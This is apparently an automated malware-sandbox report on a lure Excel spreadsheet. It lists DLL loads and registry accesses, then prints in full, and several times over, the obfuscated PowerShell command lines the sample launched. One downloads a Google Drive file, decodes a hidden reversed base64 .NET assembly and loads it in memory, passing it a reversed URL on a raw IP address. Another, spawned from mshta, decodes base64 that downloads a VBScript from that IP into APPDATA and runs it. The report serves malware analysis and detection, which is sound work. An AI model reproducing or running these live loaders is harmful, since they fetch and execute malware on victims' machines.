Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp

Source: A & C Metrology OC 545714677889Materiale.xls

Initial sample: OLE indicators vbamacros = False

Source: A & C Metrology OC 545714677889Materiale.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"

Suspicious powershell command line found

